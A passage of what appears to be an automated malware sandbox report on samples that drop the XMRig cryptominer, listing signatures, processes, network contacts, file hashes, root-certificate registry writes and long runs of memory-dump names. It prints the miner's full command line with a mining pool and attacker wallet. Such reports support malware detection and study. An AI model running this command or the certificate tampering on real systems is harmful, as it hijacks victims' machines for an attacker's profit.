memory/4988-32-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-33-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-34-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-35-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-36-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-37-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-38-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-39-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-40-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-41-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-42-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-43-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-44-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-45-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-46-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-47-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-48-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-49-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-50-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-51-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-52-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-53-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-54-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-55-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-56-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-57-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-58-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-59-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-60-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-61-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-62-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-63-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-64-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-65-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-66-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-67-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-68-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-69-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-70-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-71-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-72-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-73-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-74-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-75-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-76-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-77-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-78-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-79-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-80-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-81-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-82-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-83-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

memory/4988-84-0x00007FF77C2A0000-0x00007FF77CDA3000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:57

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1806s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4204-16-0x000001C361A60000-0x000001C361A80000-memory.dmp

memory/4204-17-0x000001C363360000-0x000001C363380000-memory.dmp

memory/4204-18-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-20-0x000001C3633A0000-0x000001C3633C0000-memory.dmp

memory/4204-19-0x000001C363380000-0x000001C3633A0000-memory.dmp

memory/4204-21-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-22-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-25-0x000001C3633A0000-0x000001C3633C0000-memory.dmp

memory/4204-24-0x000001C363380000-0x000001C3633A0000-memory.dmp

memory/4204-23-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-26-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-27-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-28-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-29-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-30-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-31-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-32-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-33-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-34-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-35-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-36-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-37-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-38-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-39-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-40-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-41-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-42-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-43-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-44-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-45-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-46-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-47-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-48-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-49-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-50-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-51-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-52-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-53-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-54-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-55-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-56-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-57-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-58-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-59-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-60-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-61-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-62-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-63-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-64-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-65-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-66-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-67-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-68-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-69-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-70-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-71-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-72-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-73-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-74-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-75-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-76-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-77-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-78-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-79-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-80-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-81-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-82-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-83-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

memory/4204-84-0x00007FF7D88C0000-0x00007FF7D93C3000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:00

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3148,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4076,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=4216 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.75:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 75.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4424-16-0x000002C13C500000-0x000002C13C520000-memory.dmp

memory/4424-17-0x000002C13C560000-0x000002C13C580000-memory.dmp

memory/4424-18-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-19-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-21-0x000002C13C5A0000-0x000002C13C5C0000-memory.dmp

memory/4424-20-0x000002C13C580000-0x000002C13C5A0000-memory.dmp

memory/4424-22-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-23-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-24-0x000002C13C580000-0x000002C13C5A0000-memory.dmp

memory/4424-25-0x000002C13C5A0000-0x000002C13C5C0000-memory.dmp

memory/4424-26-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-27-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-28-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-29-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-30-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-31-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-32-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-33-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-34-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-35-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-36-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-37-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

memory/4424-38-0x00007FF73AEA0000-0x00007FF73B9A3000-memory.dmp

